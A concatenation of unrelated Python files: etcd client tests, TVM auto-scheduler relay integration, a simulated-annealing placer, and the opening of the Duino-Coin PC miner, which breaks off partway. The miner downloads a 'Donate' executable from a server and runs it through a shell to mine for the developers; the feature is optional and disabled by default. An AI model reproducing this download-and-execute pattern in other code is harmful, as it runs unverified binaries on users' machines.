with subtests.test("we should be able to write a single value for an existent key"):
assert (
etcd_client.write_file("{}/write/key_1".format(prefix), "new_value_1")
== "new_value_1"
)
assert etcd_client.get("{}/write/key_1".format(prefix)) == "new_value_1"
with subtests.test("we should be able to write a single value with a ttl"):
assert (
etcd_client.write_file(
"{}/write/ttl_key".format(prefix), "new_value_2", ttl=5
)
== "new_value_2"
)
time.sleep(10)
assert etcd_client.get("{}/write/ttl_key".format(prefix)) is None
def test_write_directory(subtests, etcd_client, prefix, etcd_version):
"""
Test solely writing directories
"""
if etcd_version != EtcdVersion.v2:
pytest.skip("write_directory is not defined for etcd v3")
with subtests.test("we should be able to create a non-existent directory"):
assert etcd_client.write_directory("{}/write_dir/dir1".format(prefix), None)
assert etcd_client.get("{}/write_dir/dir1".format(prefix)) is None
with subtests.test("writing an already existent directory should return True"):
assert etcd_client.write_directory("{}/write_dir/dir1".format(prefix), None)
assert etcd_client.get("{}/write_dir/dir1".format(prefix)) is None
with subtests.test("we should be able to write to a new directory"):
assert (
etcd_client.write_file("{}/write_dir/dir1/key1".format(prefix), "value1")
== "value1"
)
assert etcd_client.get("{}/write_dir/dir1/key1".format(prefix)) == "value1"
def test_ls(subtests, etcd_client, prefix):
"""
Test listing top level contents
"""
with subtests.test("ls on a non-existent directory should return an empty dict"):
assert not etcd_client.ls("{}/ls".format(prefix))
with subtests.test(
"ls should list the top level keys and values at the given path"
):
etcd_client.set("{}/ls/1".format(prefix), "one")
etcd_client.set("{}/ls/2".format(prefix), "two")
etcd_client.set("{}/ls/3/4".format(prefix), "three/four")
# If it's a dir, it's suffixed with a slash
expected = {
"{}/ls".format(prefix): {
"{}/ls/1".format(prefix): "one",
"{}/ls/2".format(prefix): "two",
"{}/ls/3/".format(prefix): {},
},
}
assert etcd_client.ls("{}/ls".format(prefix)) == expected
@pytest.mark.parametrize("func", ("rm", "delete"))
def test_rm_and_delete(subtests, etcd_client, prefix, func, etcd_version):
"""
Ensure we can remove keys using rm
"""
func = getattr(etcd_client, func)
with subtests.test("removing a non-existent key should do nothing"):
assert func("{}/rm/key1".format(prefix)) is None
with subtests.test("we should be able to remove an existing key"):
etcd_client.set("{}/rm/key1".format(prefix), "value1")
assert func("{}/rm/key1".format(prefix))
assert etcd_client.get("{}/rm/key1".format(prefix)) is None
with subtests.test("we should be able to remove an empty directory"):
if etcd_version == EtcdVersion.v2:
etcd_client.write_directory("{}/rm/dir1".format(prefix), None)
assert func("{}/rm/dir1".format(prefix), recurse=True)
assert etcd_client.get("{}/rm/dir1".format(prefix), recurse=True) is None
with subtests.test("we should be able to remove a directory with keys"):
updated = {
"dir1": {
"rm-1": "value-1",
"rm-2": {
"sub-rm-1": "subvalue-1",
"sub-rm-2": "subvalue-2",
},
}
}
etcd_client.update(updated, path="{}/rm".format(prefix))
assert func("{}/rm/dir1".format(prefix), recurse=True)
assert etcd_client.get("{}/rm/dir1".format(prefix), recurse=True) is None
assert etcd_client.get("{}/rm/dir1/rm-1".format(prefix), recurse=True) is None
with subtests.test("removing a directory without recursion should do nothing"):
updated = {
"dir1": {
"rm-1": "value-1",
"rm-2": {
"sub-rm-1": "subvalue-1",
"sub-rm-2": "subvalue-2",
},
}
}
etcd_client.update(updated, path="{}/rm".format(prefix))
assert func("{}/rm/dir1".format(prefix)) is None
assert (
etcd_client.get("{}/rm/dir1".format(prefix), recurse=True)
== updated["dir1"]
)
assert etcd_client.get("{}/rm/dir1/rm-1".format(prefix)) == "value-1"
def test_tree(subtests, etcd_client, prefix, etcd_version):
"""
Tree should return a dictionary representing what is downstream of the prefix.
"""
with subtests.test("the tree of a non-existent key should be None"):
assert etcd_client.tree(prefix) is None
with subtests.test("the tree of an file should be {key: value}"):
etcd_client.set("{}/1".format(prefix), "one")
assert etcd_client.tree("{}/1".format(prefix)) == {"1": "one"}
with subtests.test("the tree of an empty directory should be empty"):
if etcd_version == EtcdVersion.v2:
etcd_client.write_directory("{}/2".format(prefix), None)
assert etcd_client.tree("{}/2".format(prefix)) == {}
with subtests.test("we should be able to recieve the tree of a directory"):
etcd_client.set("{}/3/4".format(prefix), "three/four")
expected = {
"1": "one",
"2": {},
"3": {"4": "three/four"},
}
if etcd_version != EtcdVersion.v2:
expected.pop("2")
assert etcd_client.tree(prefix) == expected
with subtests.test("we should be able to recieve the tree of an outer directory"):
etcd_client.set("{}/5/6/7".format(prefix), "five/six/seven")
expected = {
"6": {"7": "five/six/seven"},
}
assert etcd_client.tree("{}/5".format(prefix)) == expected
def test_watch(subtests, etcd_client, prefix):
updated = {
"1": "one",
"2": "two",
"3": {
"4": "three/four",
},
}
etcd_client.update(updated, path="{}/watch".format(prefix))
with subtests.test("watching an invalid key should timeout and return None"):
assert etcd_client.watch("{}/invalid".format(prefix), timeout=3) is None
with subtests.test(
"watching an valid key with no changes should timeout and return None"
):
assert etcd_client.watch("{}/watch/1".format(prefix), timeout=3) is None
# Wait for an update
with subtests.test("updates should be able to be caught by waiting in read"):
return_list = []
def wait_func(return_list):
return_list.append(
etcd_client.watch("{}/watch/1".format(prefix), timeout=30)
)
wait_thread = threading.Thread(target=wait_func, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/watch/1".format(prefix), "not one")
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/watch/1".format(prefix)
assert modified["value"] == "not one"
# Wait for an update using recursive
with subtests.test("nested updates should be catchable"):
return_list = []
def wait_func_2(return_list):
return_list.append(
etcd_client.watch("{}/watch".format(prefix), timeout=30, recurse=True)
)
wait_thread = threading.Thread(target=wait_func_2, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/watch/1".format(prefix), "one again!")
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/watch/1".format(prefix)
assert modified["value"] == "one again!"
# Wait for an update after last modification
with subtests.test(
"updates should be able to be caught after an index by waiting in read"
):
return_list = []
last_modified = modified["mIndex"]
def wait_func_3(return_list):
return_list.append(
etcd_client.watch(
"{}/watch/1".format(prefix),
timeout=30,
start_revision=last_modified + 1,
)
)
wait_thread = threading.Thread(target=wait_func_3, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/watch/1".format(prefix), "one")
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/watch/1".format(prefix)
assert modified["value"] == "one"
# Wait for an update after last modification, recursively
with subtests.test("nested updates after index should be catchable"):
return_list = []
last_modified = modified["mIndex"]
def wait_func_4(return_list):
return_list.append(
etcd_client.watch(
"{}/watch".format(prefix),
timeout=30,
recurse=True,
start_revision=last_modified + 1,
)
)
wait_thread = threading.Thread(target=wait_func_4, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/watch/1".format(prefix), "one")
wait_thread.join()
modified = return_list.pop()
assert modified["key"] == "{}/watch/1".format(prefix)
assert modified["value"] == "one"
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import threading
import tvm
from tvm import te, transform
from tvm.te.tensor import ComputeOp, PlaceholderOp
from .compute_dag import ComputeDAG
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .workload_registry import register_workload_tensors
def call_all_topi_funcs(mod, params, target):
"""Call all TOPI compute + schedule to extract tasks in a relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_runtime_codegen
with transform.PassContext(opt_level=3):
opt_mod, _ = relay.optimize(mod, target, params)
grc = graph_runtime_codegen.GraphRuntimeCodegen(None, target)
grc.codegen(opt_mod["main"])
def extract_tasks(mod, params, target, target_host=None, hardware_params=None):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
if isinstance(target, str):
target = Target(target)
if isinstance(target_host, str):
target_host = Target(target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(TracingMode.EXTRACT_TASK)
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(target=call_all_topi_funcs, args=(mod, params, target))
build_thread.start()
build_thread.join()
# query the compile engine to get the number of occurrence of all tasks
engine = relay.backend.compile_engine.get()
use_count_dict = {}
for k, v in engine.items():
use_count_dict[k] = v.use_count
# create search tasks
tasks = []
weights = []
for wkl_key, ccache_key in env.wkl_key_to_ccache_key.items():
dag = ComputeDAG(wkl_key)
tasks.append(SearchTask(dag, wkl_key, target, target_host, hardware_params))
weights.append(use_count_dict[ccache_key] + 1)
# clean the cached lowering results
engine.clear()
return tasks, weights
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
PREPARE_LAYOUT_REWRITE = 1 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.wkl_key_to_ccache_key = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, workload_key, ccache_key):
"""Add the workload key of a search task
Parameters
----------
workload_key: str
The workload key of a task
ccache_key: CCacheKey
The corresponding ccache_key of the task
"""
self.wkl_key_to_ccache_key[workload_key] = ccache_key
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get both input and output tensors
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
"""
layout_free_ops = []
inputs = []
visited = set()
def traverse(t):
if t in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t)
for t in outs:
traverse(t)
has_layout_free = len(layout_free_ops) > 0
return inputs + list(outs), has_layout_free
# The suffix of implementations that use the auto-scheduler in the OpStrategy.
auto_schedule_impl_suffix = ".auto_scheduler"
def auto_schedule_topi(outs):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
outs: List[Tensor]
The output tensors of topi compute functions
Returns
-------
sch: te.Schedule
A topi schedule function
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
io_tensors, has_layout_free = traverse_to_get_io_tensors(outs)
key = register_workload_tensors(io_tensors)
# only enable layout rewrite for cpu backend
enable_layout_rewrite = "cpu" in tvm.target.Target.current().keys
env = TracingEnvironment.current
if env is None: # in the final build mode
state = DispatchContext.current.query(tvm.target.Target.current(), key)
if state is None:
return te.create_schedule([x.op for x in outs])
dag = ComputeDAG(io_tensors)
schedule, _ = dag.apply_steps_from_state(state)
elif env.tracing_mode == TracingMode.EXTRACT_TASK: # in the task extraction mode
engine = relay.backend.compile_engine.get()
ccache_key = engine.get_current_ccache_key()
env.add_workload_key(key, ccache_key)
schedule = te.create_schedule([x.op for x in outs])
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# todo(merrymercy, minminsun): port layout rewrite
raise NotImplementedError
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
|
SAv3.py
|
#Author: Jaspreet Jhoja
#contact:Jaspreetj@ece.ubc.ca
import random,copy, statistics, timeit, threading, math
from math import *
import numpy as np
import matplotlib.pyplot as plt
import plot as pt
import queue as Queue
print("SIMULATED ANNEALING BASED PLACER")
files = ['cm138a.txt', 'cm150a.txt', 'cm151a.txt', 'cm162a.txt', 'alu2.txt', 'C880.txt',
'e64.txt', 'apex1.txt', 'cps.txt', 'paira.txt', 'pairb.txt', 'apex4.txt']
for i in range(len(files)):
print('['+str(i)+']'+' - '+ files[i])
choice = input("choose files to run")
gui_choice = input("Do you want to see the progress in a GUI? y/n")
#if you want to use custom iterations and temperature, define here
user_iterations = 0
user_temp = 0
#want to run a mix of temperature handlers
hybrid = 0
#or choice in range(len(files)):
for i in range(1):
filename = files[int(choice)]
print(filename)
global nets, nodes, grid, netsn, nodesn, plot_x, plot_y
nets = [] #net details
nodes = {} #store all nodes in a dictionary
grid = [] #stores grid size
netsn = 0 #number of nets
nodesn = 0 #number of nodes
optimum = {}#optimum results
plot_x = []
plot_y = []
old_swap = [None, None]#previously swapped nodes
new_swap = [None, None] #currently proposed moves to swap
## Simulated Annealing variables
current_cost = 0 #initial or current cost
new_cost = 0 #new proposed cost
old_temp = 0 #previous temperature
current_temp = 0 #current or initial temperature
iterations = 0 #iterations
##################### NOTES ###################
#to get sinks for a node
#get nodedata by nodes[number][0]
#get sinks list by nodes[number][1]
#function to read file
def readfile(filename):
global grid, netsn, nodesn, nets, nodes
#split lines to read one by one
lines = open(filename).read().splitlines()
#extract grid
grid = [int(lines[0].split(' ')[-1]),int(lines[0].split(' ')[-2])]
nets = []
#iterate lines, extract number of nets and individual net nodes
for i in range(len(lines)):
if(i==0):
netsn = int(lines[i].split(' ')[-3]) #extract number of nets
nodesn = int(lines[i].split(' ')[0]) #extract number of nodes
#generate coordinates for nodes which we will use for cost eval
coordinates = []
for c in range(grid[0]):
for r in range(grid[1]):
coordinates.append([c,r*2])
#based on number of nodes, create dictionary keys
for each_node in range(grid[0]*grid[1]):
nodes[str(each_node)] = [coordinates[each_node],[]]
else:
#separate the net details and put them in a list
temp = list(filter(None,lines[i].split(' ')[1:]))
if(len(temp)>0):
nets.append(temp)
# associate nodes to their connections
source =temp[0]
sinks = temp[1:]
for each_sink in sinks:
nodes[source][1].append([each_sink])
# for nodes with no sinks, set none as their sinks so no arrow emerge from those nodes
for each_node in nodes:
sink_list = nodes[str(each_node)][1]
if(len(sink_list)==0):
nodes[str(each_node)][1].append(None)
#run the read function
readfile(filename)
# select two nodes which have not been repeated in the previous swap
def select_nodes(nodes_dict, previous_swaps):
new_lot = []
while True:
if(len(new_lot)==2):
#check if i am swapping two unoccupied slots
a = new_lot[0]
b = new_lot[1]
coor_a = nodes_dict[a][0][0]
coor_b = nodes_dict[b][0][0]
if(coor_a == None and coor_b == None):
print(new_lot)
new_lot = []
else:
return new_lot
new_node = random.choice([x for x in range(grid[0]*grid[1]) if x not in previous_swaps])
new_lot.append(str(new_node))
# accept moves
def make_swap(nodes_dict,swap):
a = swap[0]
b = swap[1]
coor_a = nodes_dict[a][0]
coor_b = nodes_dict[b][0]
nodes_dict[a][0] = coor_b
nodes_dict[b][0] = coor_a
return(nodes_dict)
#function to calculate cost
def calculate_cost(nodes_dict, nets):
cost = []
for each_net in nets:
net_x = []
net_y = []
dx = 0
dy = 0
for each_node in each_net:
data = nodes_dict[each_node][0]
net_x.append(data[0])
net_y.append(data[1])
#calculate half-perimeter
dx = abs(max(net_x) - min(net_x))
dy = abs(max(net_y) - min(net_y))
cost.append(dx+dy)
return(sum(cost))
#timer function
start_time = timeit.default_timer()
#setup SA
if(user_iterations == 0):
iterations = int(10*((nodesn)**(4/3)))
else:
iterations = user_iterations
initial_cost = calculate_cost(nodes, nets)
sigma = 0 #std dev of cost of accepted solutions
sigma_list = [] #list to store solutions
r_val = []
#set initial temperature
if(user_temp == 0):
for i in range(50):
sigma_node = copy.deepcopy(nodes)
sigma_swap = select_nodes(sigma_node, old_swap)
old_swap = sigma_swap
sigma_node = make_swap(sigma_node, sigma_swap)
temp_cost = calculate_cost(sigma_node, nets)
if(temp_cost<initial_cost):
sigma_list.append(temp_cost)
#calculate the standard deviation of accepted sigma values
sigma = statistics.stdev(sigma_list)
current_temp = 20*sigma
print(initial_cost, current_temp, iterations)
old_swap=[None, None]
#start with simulated annealing
#start plotting
if(gui_choice == "y"):
queue = Queue.Queue()
plot_thread = threading.Thread(target=pt.plotter, args=(queue, ))
plot_thread.start()
#check if cost is being repeated
isrepeating = 0
#record optimum node ever came across
optimum = nodes
while current_temp!=0:
sigma_list = []
for i in range(iterations):
current_cost = calculate_cost(nodes, nets)
#copy nodes data
temp_nodes = copy.deepcopy(nodes)
#get nodes to swap for temp_nodes
new_swap = select_nodes(temp_nodes, old_swap)
old_swap = new_swap
#modify node data
temp_nodes = make_swap(temp_nodes, new_swap)
#get cost for new swap
new_cost = calculate_cost(temp_nodes, nets)
dc = new_cost - current_cost
#if good
if(dc<0):
nodes = temp_nodes
sigma_list.append(new_cost)
#update best
#if bad
else:
r = random.random()
if(r< math.e**(-dc/current_temp)):
nodes = temp_nodes
sigma_list.append(new_cost)
if(calculate_cost(optimum,nets)<calculate_cost(nodes, nets)):
optimum = nodes
#current_temp = 0.98 *current_temp
#acceptance ratio of moves accepted to total tried
R_accept = len(sigma_list)/iterations
previous_temp = copy.deepcopy(current_temp)
if(0.96 < R_accept):
alpha = 0.5
elif(0.8 < R_accept and R_accept<=0.96):
alpha = 0.9
elif(0.05 < R_accept and R_accept<=0.8):
if(iterations==500):
alpha = 0.98
else:
alpha = 0.95
elif(R_accept<=0.05):
alpha = 0.8
r_val.append(alpha)
try:
if(hybrid == 1):
#check if temperature is stuck
if(isrepeating ==5):
current_temp = alpha*current_temp
isrepeating = 0
elif(isrepeating >=10):
current_temp = 0
else:
sigma = statistics.stdev(sigma_list)
current_temp = current_temp *math.e**(-0.7*(current_temp/sigma))
isrepeating = 0
else:
current_temp = alpha*current_temp
isrepeating = 0
except Exception as e:
None
#COMMENT THIS LINE IF DONT WANT ANY UPDATES
print(alpha,calculate_cost(nodes, nets), current_temp )
if(str(previous_temp)[:7] == str(current_temp)[:7]):
isrepeating = isrepeating + 1
#print(isrepeating)
if(current_temp<5e-6):
current_temp = 0
#add for plotting
if(gui_choice == "y"):
pt.update_data_sync(current_temp, calculate_cost(nodes, nets))
queue.put("GO")
# print(calculate_cost(nodes,nets), current_temp)
final_cost = calculate_cost(nodes, nets)
elapsed = timeit.default_timer() - start_time
print("time elapsed : ", elapsed)
print("final cost :", final_cost)
if(gui_choice == 'y'):
queue.put('BYE')
|
PC_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner 2.74 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import Lock as thread_lock
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from random import randint
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call
import pip
import select
# import testerlib as njs
# from testerlib import log as log
import sys
import os
import json
import requests
from pathlib import Path
from re import sub
from random import choice
from platform import machine as osprocessor
from signal import SIGINT, signal
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from configparser import ConfigParser
configparser = ConfigParser()
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
_exit(0)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from xxhash import xxh64
xxhash_en = True
except ModuleNotFoundError:
print("Xxhash is not installed - this mining algorithm will be disabled")
xxhash_en = False
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 2.74
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
SOC_TIMEOUT = 15
REPORT_TIME = 50
DONATE_LVL = 0
BLOCK = " ‖ "
PICK = ""
COG = " @"
if os.name != "nt" or bool(os.name == "nt" and os.environ.get("WT_SESSION")):
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
def XXHASH(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
for nonce in range(100 * diff + 1):
d_res = xxh64(last_h + str(nonce),
seed=2811).hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
def send(msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
"""
Fetches best pool from the /getPool API endpoint
"""
while True:
pretty_print(" " + get_string("connection_search"),
"warning", "net0")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(10)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print(f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error", "net0")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if os.name == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
if donation_level <= 0:
pretty_print(
Fore.YELLOW + get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning', 'sys0')
sleep(5)
if donation_level > 0:
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print(get_string('thanks_donation').replace("\n", "\n\t\t"),
'error', 'sys0')
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
val = str(round(val)) + " "
return val + symbol
def periodic_report(start_time, end_time,
shares, hashrate, uptime):
"""
Displays nicely formated uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + get_string("uptime_seconds")
elif uptime == 60:
return str(round(uptime // 60)) + get_string("uptime_minute")
elif uptime >= 60:
return str(round(uptime // 60)) + get_string("uptime_minutes")
elif uptime == 3600:
return str(round(uptime // 3600)) + get_string("uptime_hour")
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string("uptime_hours")
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type,
accept, reject,
hashrate, total_hashrate,
computetime, diff, ping,
back_color):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ " cpu" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2021")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + lang.capitalize()
